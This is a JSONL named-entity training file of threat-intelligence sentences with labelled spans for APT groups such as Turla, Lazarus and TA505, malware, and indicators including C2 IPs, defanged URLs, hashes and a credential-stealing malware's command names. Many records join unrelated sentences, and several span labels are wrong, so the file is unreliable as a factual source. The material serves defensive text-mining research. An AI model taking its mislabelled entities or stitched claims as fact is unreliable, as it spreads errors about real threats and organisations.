.", "spans": {"THREAT_ACTOR: actors": [[229, 235]], "THREAT_ACTOR: Winnti": [[360, 366]], "FILEPATH: dde82093decde6371eb852a5e9a1aa4acf3b56ba": [[369, 409]], "URL: https://bugcheck.xigncodeservice.com/Common/Lib/common.php": [[410, 468]], "THREAT_ACTOR: LockBit": [[471, 478]], "ORGANIZATION: US organizations": [[525, 541]], "ORGANIZATION: CISA": [[611, 615]]}, "info": {"id": "cyberner_stix_train_004061", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 45.63.10.99 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 45.63.10.99": [[11, 22]]}, "info": {"id": "cyberner_stix_train_004062", "source": "cyberner_stix_train"}} {"text": "Every five minutes it collects basic system information and sends it to the C2 server .", "spans": {"TOOL: C2": [[76, 78]]}, "info": {"id": "cyberner_stix_train_004063", "source": "cyberner_stix_train"}} {"text": "However , an investigation by 
Symantec has found that Butterfly has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number . The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers . Turla is a well-documented , long operating APT group that is widely believed to be a Russian state-sponsored organization . Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 . More recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . Assuming this variant of KopiLuwak has been observed in the wild , there are a number of ACTs it may have been delivered including some of Turla’s previous attack methods such as spear phishing or via a watering hole . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists . Turla's goal could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . 
As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla’s more fully featured implants . Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations . We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak .", "spans": {"ORGANIZATION: Symantec": [[30, 38]], "THREAT_ACTOR: Butterfly": [[54, 63]], "THREAT_ACTOR: Turla": [[308, 313], [450, 455], [575, 580], [710, 715], [2541, 2546], [2980, 2985]], "ORGANIZATION: G20": [[333, 336]], "ORGANIZATION: RUAG": [[741, 745]], "ORGANIZATION: GovCERT.ch": [[809, 819]], "FILEPATH: MSIL dropper": [[893, 905], [1638, 1650], [1701, 1713]], "ORGANIZATION: Proofpoint": [[932, 942], [2001, 2011]], "THREAT_ACTOR: Turla’s": [[1127, 1134], [2502, 2509]], "ORGANIZATION: diplomats": [[1226, 1235]], "ORGANIZATION: journalists": [[1331, 1342]], "THREAT_ACTOR: Turla's": [[1345, 1352]], "ORGANIZATION: Digital Economy": [[1431, 1446]], "FILEPATH: KopiLuwak": [[1561, 1570], [1962, 1971], [2179, 2188]], "TOOL: PDF": [[1752, 1755]], "FILEPATH: Javascript (JS) dropper": [[1768, 1791]], "FILEPATH: JS dropper": [[1837, 1847]], "FILEPATH: JS decryptor": [[1870, 1882]], "FILEPATH: MSIL payload": [[2143, 
2155]], "TOOL: C&C": [[2233, 2236]], "ORGANIZATION: Kaspersky": [[2361, 2370]], "FILEPATH: .NET malware": [[2829, 2841]], "FILEPATH: Topinambour": [[2862, 2873]], "FILEPATH: .NET module": [[2903, 2914]], "FILEPATH: KopiLuwak JavaScript": [[2939, 2959]], "MALWARE: Trojan": [[2960, 2966]]}, "info": {"id": "cyberner_stix_train_004064", "source": "cyberner_stix_train"}} {"text": "Secure both the operating system and the application .", "spans": {}, "info": {"id": "cyberner_stix_train_004065", "source": "cyberner_stix_train"}} {"text": ") “ % USERNAME % , ti ho inviato il pagamento subitop [ . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . This ID is generated based on the installation date of the system .", "spans": {"ORGANIZATION: FireEye": [[58, 65]], "THREAT_ACTOR: TEMP.Hermit": [[130, 141]]}, "info": {"id": "cyberner_stix_train_004066", "source": "cyberner_stix_train"}} {"text": "Earlier Downeks samples were all written in native code .", "spans": {"MALWARE: Downeks": [[8, 15]]}, "info": {"id": "cyberner_stix_train_004067", "source": "cyberner_stix_train"}} {"text": "The potential actor and who they target Our current analysis strongly suggests Desert Scorpion is being deployed in targeted attacks against Middle Eastern individuals of interest specifically those in Palestine and has also been highlighted by other researchers . In all of these incidents , the Lazarus utilized similar toolsets , including KillDisk that was executed on compromised machines . Depending on the type of decompression engine used, there is a good probability that only the decoy file may be scrutinized and vetted, and the malicious content unnoticed – just like how some of the most popular archiving tools failed to notice the second ZIP . 
STRATOFEAR is a modular backdoor that communicates with C2 servers using a protocol specified in its C2 configuration , which is decrypted from a local file .", "spans": {"MALWARE: Desert Scorpion": [[79, 94]], "THREAT_ACTOR: Lazarus": [[297, 304]], "TOOL: KillDisk": [[343, 351]], "MALWARE: STRATOFEAR": [[659, 669]]}, "info": {"id": "cyberner_stix_train_004068", "source": "cyberner_stix_train"}} {"text": "We found more macOS malware similar to that used in the original Operation AppleJeus case .", "spans": {"SYSTEM: macOS": [[14, 19]]}, "info": {"id": "cyberner_stix_train_004070", "source": "cyberner_stix_train"}} {"text": "From August to October , Guccifer 2.0 posted several additional installments of what appear to be internal DCCC documents on “ his ” WordPress site .", "spans": {"THREAT_ACTOR: Guccifer": [[25, 33]], "ORGANIZATION: DCCC": [[107, 111]]}, "info": {"id": "cyberner_stix_train_004071", "source": "cyberner_stix_train"}} {"text": "TA505 turned to URLs in early August 2017 to distribute Locky , finally eschewing the document or zipped script attachments that have characterized the majority of their Locky campaigns since February 2016 ; most of these URLs linked to malicious documents and scripts .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Locky": [[56, 61], [170, 175]], "TOOL: zipped": [[98, 104]]}, "info": {"id": "cyberner_stix_train_004072", "source": "cyberner_stix_train"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58729 [ . In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks . 
APT28 : SNAKEMACKEREL , Swallowtail , Group 74 , Sednit , Sofacy , Pawn Storm , Fancy Bear , STRONTIUM , Tsar Team , Threat Group-4127 , TG-4127 .", "spans": {"TOOL: MitM server": [[83, 94]], "ORGANIZATION: Talos": [[140, 145]], "TOOL: additional servers": [[160, 178]], "THREAT_ACTOR: actor": [[196, 201]], "THREAT_ACTOR: APT28": [[232, 237]], "THREAT_ACTOR: SNAKEMACKEREL": [[240, 253]], "THREAT_ACTOR: Swallowtail": [[256, 267]], "THREAT_ACTOR: Group 74": [[270, 278]], "THREAT_ACTOR: Sednit": [[281, 287]], "THREAT_ACTOR: Sofacy": [[290, 296]], "THREAT_ACTOR: Pawn Storm": [[299, 309]], "THREAT_ACTOR: Fancy Bear": [[312, 322]], "THREAT_ACTOR: STRONTIUM": [[325, 334]], "THREAT_ACTOR: Tsar Team": [[337, 346]], "THREAT_ACTOR: Threat Group-4127": [[349, 366]], "THREAT_ACTOR: TG-4127": [[369, 376]]}, "info": {"id": "cyberner_stix_train_004073", "source": "cyberner_stix_train"}} {"text": "When the document is opened in Word , the instructions are not immediately visible , as Word does not display these fields contents by default .", "spans": {"TOOL: Word": [[31, 35], [88, 92]]}, "info": {"id": "cyberner_stix_train_004074", "source": "cyberner_stix_train"}} {"text": "After releasing Operation AppleJeus , the Lazarus group continued to use a similar modus operandi in order to compromise cryptocurrency businesses .", "spans": {"THREAT_ACTOR: Lazarus": [[42, 49]]}, "info": {"id": "cyberner_stix_train_004075", "source": "cyberner_stix_train"}} {"text": "This suggests that these attacks were part of a planned operation against specific targets in India .", "spans": {}, "info": {"id": "cyberner_stix_train_004076", "source": "cyberner_stix_train"}} {"text": "The executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels , maintaining slightly morphed encryption and functionality per deployment .", "spans": {}, "info": {"id": "cyberner_stix_train_004077", "source": 
"cyberner_stix_train"}} {"text": "Below is the list of all the commands catered by the C & C server . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . Sandworm Team has been linked to the Ukrainian energy sector attack in late 2015 .", "spans": {"MALWARE: Bemstour": [[68, 76]], "TOOL: DoublePulsar backdoor": [[130, 151]], "THREAT_ACTOR: Sandworm Team": [[154, 167]]}, "info": {"id": "cyberner_stix_train_004078", "source": "cyberner_stix_train"}} {"text": "The app loads a URL pointing to a Bread-controlled server . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia . Finally , it marks ZxShell main Dll for deletion with the MoveFileEx Windows API . TIEDYE supports the following protocols : tcp , tcp6 , udp , upd6 , http , https , proxy_socks4 , proxy_socks4a , pipe , ssl , ssl3 , and rdp .", "spans": {"THREAT_ACTOR: Bahamut": [[122, 129]], "MALWARE: ZxShell": [[251, 258]], "TOOL: Dll": [[264, 267]], "SYSTEM: Windows": [[301, 308]], "MALWARE: TIEDYE": [[315, 321]], "SYSTEM: tcp": [[357, 360]], "SYSTEM: tcp6": [[363, 367]], "SYSTEM: udp": [[370, 373]], "SYSTEM: upd6": [[376, 380]], "SYSTEM: http": [[383, 387]], "SYSTEM: https": [[390, 395]], "SYSTEM: proxy_socks4": [[398, 410]], "SYSTEM: proxy_socks4a": [[413, 426]], "SYSTEM: pipe": [[429, 433]], "SYSTEM: ssl": [[436, 439]], "SYSTEM: ssl3": [[442, 446]], "SYSTEM: rdp": [[453, 456]]}, "info": {"id": "cyberner_stix_train_004079", "source": "cyberner_stix_train"}} {"text": "] it server1fi.exodus.connexxa [ . TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant . 
The backdoor has rather basic C2 functionality implemented through a predefined set of URLs : Who is the Winnti group ?", "spans": {"THREAT_ACTOR: TEMP.Veles'": [[35, 46]], "TOOL: PowerShell-based tool": [[101, 122]], "TOOL: WMImplant": [[125, 134]], "MALWARE: backdoor": [[141, 149]], "TOOL: C2": [[167, 169]], "THREAT_ACTOR: Winnti group": [[242, 254]]}, "info": {"id": "cyberner_stix_train_004080", "source": "cyberner_stix_train"}} {"text": "In the quadrant , the smaller boxes in blue-gray represent particular apps in the RuMMS family , while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps . The OilRig group continues to be a persistent adversary group in the Middle East region . The oldest one from November 2019 , named \" Urgent.docx \" . Mandiant has identified zero - day exploitation of this vulnerability in the wild beginning in late August 2023 as well as n - day exploitation after Citrix ’s publication .", "spans": {"MALWARE: RuMMS": [[82, 87], [167, 172]], "THREAT_ACTOR: OilRig group": [[184, 196]], "THREAT_ACTOR: group": [[236, 241]], "FILEPATH: Urgent.docx": [[314, 325]], "ORGANIZATION: Mandiant": [[330, 338]], "VULNERABILITY: zero - day exploitation": [[354, 377]]}, "info": {"id": "cyberner_stix_train_004081", "source": "cyberner_stix_train"}} {"text": "Backdoored Conversations C2 server analysis During the analysis of the Smali injected apps and their C2 server infrastructure we hadn ’ t found any interesting clues , but things changed when we looked at the C2 server of the linked Conversations messenger . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . 
ScarCruft tools : 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester .", "spans": {"VULNERABILITY: CVE-2018-8414": [[333, 346]], "THREAT_ACTOR: DarkHydrus": [[436, 446]], "THREAT_ACTOR: ScarCruft": [[449, 458]], "FILEPATH: 02681a7fe708f39beb7b3cf1bd557ee9": [[467, 499]], "TOOL: Bluetooth": [[500, 509]]}, "info": {"id": "cyberner_stix_train_004082", "source": "cyberner_stix_train"}} {"text": "It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": {"THREAT_ACTOR: ScarCruft": [[25, 34]], "VULNERABILITY: zero day exploit": [[52, 68]], "VULNERABILITY: CVE-2016-0147": [[71, 84]], "MALWARE: CVE software vulnerabilities": [[295, 323]]}, "info": {"id": "cyberner_stix_train_004083", "source": "cyberner_stix_train"}} {"text": "During this period , TG-4127 created 213 short links targeting 108 email addresses on the hillaryclinton.com domain .", "spans": {"THREAT_ACTOR: TG-4127": [[21, 28]], "TOOL: email": [[67, 72]], "DOMAIN: hillaryclinton.com": [[90, 108]]}, "info": {"id": "cyberner_stix_train_004084", "source": "cyberner_stix_train"}} {"text": "It ’ s possible , as with other Android malware , that some apps may also be available on forums , file-sharing sites or even sent to victims as email attachments , and we were only able to determine the delivery mechanism for a handful of the apps we have been able to find . The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . 
More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": {"SYSTEM: Android": [[32, 39]], "MALWARE: backdoor": [[281, 289]], "THREAT_ACTOR: APT33": [[410, 415]], "ORGANIZATION: organization": [[443, 455]], "ORGANIZATION: business conglomerate": [[475, 496]], "FILEPATH: malicious file": [[505, 519]], "ORGANIZATION: petrochemical company": [[592, 613]]}, "info": {"id": "cyberner_stix_train_004085", "source": "cyberner_stix_train"}} {"text": "It is important to note that the data won ’ t be uploaded to C & C server automatically . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": {"MALWARE: Microsoft Word attachment": [[174, 199]], "VULNERABILITY: CVE-2017-0199": [[232, 245]], "TOOL: ZeroT Trojan": [[260, 272]], "TOOL: PlugX Remote Access Trojan": [[304, 330]], "TOOL: RAT": [[333, 336]], "THREAT_ACTOR: PROMETHIUM": [[341, 351]], "THREAT_ACTOR: NEODYMIUM": [[356, 365]], "VULNERABILITY: zero-day": [[378, 386]], "VULNERABILITY: exploit": [[387, 394]]}, "info": {"id": "cyberner_stix_train_004086", "source": "cyberner_stix_train"}} {"text": "Based on the evolution of Ginp it is clear that it isn ’ t based on Anubis , but rather reuses some of its code . APT10 also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . 
Since the source code is publicly available , Gh0st RAT has been used by multiple actors for years .", "spans": {"MALWARE: Ginp": [[26, 30]], "MALWARE: Anubis": [[68, 74]], "THREAT_ACTOR: APT10": [[114, 119]], "TOOL: WinRAR": [[130, 136]], "TOOL: cURL": [[141, 145]], "MALWARE: Gh0st RAT": [[316, 325]]}, "info": {"id": "cyberner_stix_train_004087", "source": "cyberner_stix_train"}} {"text": "The next day , Kaspersky also published their own research on the malware .", "spans": {"ORGANIZATION: Kaspersky": [[15, 24]]}, "info": {"id": "cyberner_stix_train_004088", "source": "cyberner_stix_train"}} {"text": "Move the value of a register into the VM descriptor 0x20 JNB Jump if not below/Jump if above or equal/Jump if not carry 0x21 JNP Jump if not parity/Jump if parity odd Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM . While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary . Winnti : 7f73def251fcc34cbd6f5ac61822913479124a2a Wed Nov 14 03:50:18 2018 19317120 44260a1d . Harrison signed his threatening missive with the salutation , “ We are legion , ” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": {"TOOL: Elise Trojan": [[479, 491]], "TOOL: Emissary": [[519, 527]], "THREAT_ACTOR: Winnti": [[530, 536]], "FILEPATH: 7f73def251fcc34cbd6f5ac61822913479124a2a": [[539, 579]], "THREAT_ACTOR: Harrison": [[625, 633]], "ORGANIZATION: Ashley Madison": [[764, 778]]}, "info": {"id": "cyberner_stix_train_004089", "source": "cyberner_stix_train"}} {"text": "This should be highly alarming to any government agency or enterprise . 
A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 . The ShellMainThreadInt function gets the HeapDestroy Windows API address and replaces the first 3 bytes with the RET 4 opcode . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"TOOL: Kazuar": [[152, 158]], "SYSTEM: Windows": [[250, 257]], "VULNERABILITY: vulnerabilities are accessible via the internet": [[365, 412]]}, "info": {"id": "cyberner_stix_train_004090", "source": "cyberner_stix_train"}} {"text": "Recently , the 360 Core Security discovered an APT attack code named as APT-C-26 against cryptocurrency institutions and related individuals . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 .", "spans": {"ORGANIZATION: 360 Core Security": [[15, 32]], "THREAT_ACTOR: APT-C-26": [[72, 80]], "TOOL: RTF": [[187, 190]], "ORGANIZATION: Microsoft": [[222, 231]], "SYSTEM: Windows": [[232, 239]], "VULNERABILITY: CVE-2017-0199": [[267, 280]]}, "info": {"id": "cyberner_stix_train_004091", "source": "cyberner_stix_train"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . In this case , the malware is signed off by a “ developer ” , which may actually be a dummy account or that of a compromised user .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]]}, "info": {"id": "cyberner_stix_train_004092", "source": "cyberner_stix_train"}} {"text": "DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . 
This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "TOOL: FuZZbuNch": [[81, 90]], "TOOL: DisableSecurity": [[196, 211]], "TOOL: EnableSecurity": [[216, 230]], "TOOL: DarkPulsar": [[235, 245]]}, "info": {"id": "cyberner_stix_train_004093", "source": "cyberner_stix_train"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58717 [ . During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . In 2017 , a phishing campaign was used to target seven law and investment firms .", "spans": {"THREAT_ACTOR: actor": [[96, 101]]}, "info": {"id": "cyberner_stix_train_004094", "source": "cyberner_stix_train"}} {"text": "he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . 
Clever Kitten has moved to leveraging strategic web compromises .", "spans": {"THREAT_ACTOR: PassCV": [[3, 9]], "TOOL: publicly available RATs": [[35, 58]], "THREAT_ACTOR: Clever Kitten": [[211, 224]]}, "info": {"id": "cyberner_stix_train_004095", "source": "cyberner_stix_train"}} {"text": "the fake Facebook login page IODBSSUEEZ Send a file containing stolen Facebook credentials to the C & C server FdelSRRT Delete files containing stolen Facebook credentials chkstzeaw Launch Facebook LUNAPXER Launch apps according to the package name sent by the C & C server Gapxplister Get a list of all installed applications DOTRall8xxe Zip all the stolen files and store in the /DCIM/.dat/ directory Acouxacour Get a list of accounts on the victim 's device Fimxmiisx Open the camera A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . This group has not been directly linked to a government source , but the group 's motivations appear to overlap with those of the Chinese government .", "spans": {"SYSTEM: Facebook": [[9, 17], [70, 78], [151, 159], [189, 197]], "MALWARE: Bemstour": [[527, 535]], "ORGANIZATION: Chinese government": [[794, 812]]}, "info": {"id": "cyberner_stix_train_004096", "source": "cyberner_stix_train"}} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . 
The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update .", "spans": {"MALWARE: flare-qdb": [[18, 27]], "MALWARE: ShadowPad": [[153, 162]], "THREAT_ACTOR: Barium": [[185, 191]], "ORGANIZATION: third-party software provider": [[226, 255]]}, "info": {"id": "cyberner_stix_train_004097", "source": "cyberner_stix_train"}} {"text": "HenBox Enters the Uyghur App Store In May 2016 , a HenBox app was downloaded from uyghurapps [ . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors .", "spans": {"MALWARE: HenBox": [[0, 6], [51, 57]], "SYSTEM: Uyghur App Store": [[18, 34]], "MALWARE: JS dropper": [[140, 150]], "MALWARE: JS decryptor": [[173, 185]], "MALWARE: KopiLuwak": [[265, 274]], "THREAT_ACTOR: APT1": [[342, 346]], "THREAT_ACTOR: cyber threat actors": [[421, 440]]}, "info": {"id": "cyberner_stix_train_004098", "source": "cyberner_stix_train"}} {"text": "The second campaign identifier , from the sample compiled on the 12th , references cihaderi.net , another Turkish website that claims to provide “ news from the jihad world ” and which dedicates a section of its site to Chechnya .", "spans": {"DOMAIN: cihaderi.net": [[83, 95]]}, "info": {"id": "cyberner_stix_train_004099", "source": "cyberner_stix_train"}} {"text": "The IIS w3wp.exe process loads the malicious DLL , which CTU researchers have observed in the Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Bin directory .", "spans": {"TOOL: IIS": [[4, 7]], "FILEPATH: w3wp.exe": [[8, 16]], "TOOL: DLL": [[45, 48]], "ORGANIZATION: CTU": [[57, 60]]}, "info": {"id": 
"cyberner_stix_train_004100", "source": "cyberner_stix_train"}} {"text": "] com ) used in malicious activity and it is reasonable to assume the remaining three are or were intended to serve the same purpose . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain . Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years .", "spans": {"THREAT_ACTOR: APT41": [[135, 140]], "ORGANIZATION: Mandiant": [[318, 326]], "THREAT_ACTOR: attackers": [[361, 370]], "THREAT_ACTOR: APT29": [[371, 376]]}, "info": {"id": "cyberner_stix_train_004101", "source": "cyberner_stix_train"}} {"text": "There are also infrastructure ties between some FakeM variants and older activity using Trojans such as Elirks , Poison Ivy , and BiFrost , which were used in attacks as old as 2009 . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": {"TOOL: FakeM": [[48, 53]], "TOOL: Elirks": [[104, 110]], "TOOL: Poison Ivy": [[113, 123]], "ORGANIZATION: French diplomat": [[218, 233]], "THREAT_ACTOR: actors": [[299, 305]]}, "info": {"id": "cyberner_stix_train_004102", "source": "cyberner_stix_train"}} {"text": "The Trojan ’ s list of possible commands has remained practically unchanged throughout its life , and will be described below in detail . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . 
We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component .", "spans": {"ORGANIZATION: US-CERT Code Analysis Team": [[188, 214]], "MALWARE: botnet controller": [[224, 241]]}, "info": {"id": "cyberner_stix_train_004103", "source": "cyberner_stix_train"}} {"text": "It ’ s worth noting , newer versions of the DroidVPN app are available on Google Play , as well as in some other third-party app stores , which could indicate uyghurapps [ . The Winnti hackers broke into Henkel’s network in 2014 . On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": {"SYSTEM: DroidVPN": [[44, 52]], "SYSTEM: Google Play": [[74, 85]], "THREAT_ACTOR: Winnti": [[178, 184]], "ORGANIZATION: Henkel’s": [[204, 212]], "TOOL: emails": [[340, 346]], "ORGANIZATION: financial": [[368, 377]], "ORGANIZATION: high-tech companies": [[382, 401]]}, "info": {"id": "cyberner_stix_train_004104", "source": "cyberner_stix_train"}} {"text": "Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder .", "spans": {"TOOL: Wi-Fi networks": [[69, 83]], "THREAT_ACTOR: APT28": [[86, 91]], "TOOL: Responder": [[101, 110]]}, "info": {"id": "cyberner_stix_train_004105", "source": "cyberner_stix_train"}} {"text": "All information about your social networks , Bank accounts , Credit Cards . Silence try to apply new techniques and ways of stealing from various banking systems , including AWS CBR , ATMs , and card processing . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . 
Scripts should be captured from the file system when possible to determine their actions and intent .", "spans": {"MALWARE: AveMaria": [[213, 221]], "THREAT_ACTOR: FIN7": [[320, 324]]}, "info": {"id": "cyberner_stix_train_004106", "source": "cyberner_stix_train"}} {"text": "Kaspersky Labs , who sometimes refer to CosmicDuke as ‘ Bot Gen Studio ’ , speculated that “ one possibility is that ‘ Bot Gen Studio ’ is a malware platform also available as a so-called ‘ legal spyware ’ tool ” ;", "spans": {"ORGANIZATION: Kaspersky Labs": [[0, 14]], "MALWARE: CosmicDuke": [[40, 50]]}, "info": {"id": "cyberner_stix_train_004107", "source": "cyberner_stix_train"}} {"text": "The C2 URL is : hxxp : //64.78.161.133/ * victims ’ s_cell_phone_number * /process.php In addition to this , the malware also reports to another script , “ hxxp : //64.78.161.33/android.php ” . TG-3390 actors have used Java exploits in their SWCs . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": {"THREAT_ACTOR: TG-3390": [[194, 201]], "VULNERABILITY: Java exploits": [[219, 232]], "TOOL: SWCs": [[242, 246]], "ORGANIZATION: economic": [[330, 338]], "THREAT_ACTOR: activity groups": [[365, 380]], "ORGANIZATION: specific individuals": [[414, 434]]}, "info": {"id": "cyberner_stix_train_004108", "source": "cyberner_stix_train"}} {"text": "In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": {"ORGANIZATION: Symantec": [[15, 23]]}, "info": {"id": "cyberner_stix_train_004109", "source": "cyberner_stix_train"}} {"text": "In both these campaigns the activity group included remote triggers to deactivate exploitation , with an attempt to conceal the vulnerability , and prevent analysis of the attack . 
This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": {"THREAT_ACTOR: activity group": [[28, 42]], "FILEPATH: .lnk file": [[234, 243]], "SYSTEM: Windows": [[276, 283]]}, "info": {"id": "cyberner_stix_train_004110", "source": "cyberner_stix_train"}} {"text": "It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances . TA505 is also using FlowerPippi ( Backdoor.Win32.FLOWERPIPPI.A ) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . On June 14 , we saw TA505’s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . It later delivered an information stealer named EmailStealer , ” which stolesimple mail transfer protocol SMTP ) credentials and email addresses in the victim’s machine . On June 18 , the majority of the campaign’s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note” or Confirmation . This campaign used the abovementioned .HTML file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . On June 17 , we observed the campaign’s spam emails delivering malware-embedded Excel files directly as an attachment . 
On June 20 , we spotted the campaign’s spam emails delivering .doc and .xls files . Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . After our analysis , we found that Proofpoint reported this malware as AndroMut as well . In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS” software: a legitimate remote administration tool produced by the Russian company TektonIT . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy email Stealer” part of their arsenal . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd” and exit.exe” files , and , at the same time , some new components have been introduced , for instance the rtegre.exe” and the veter1605_MAPS_10cr0.exe” file . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . 
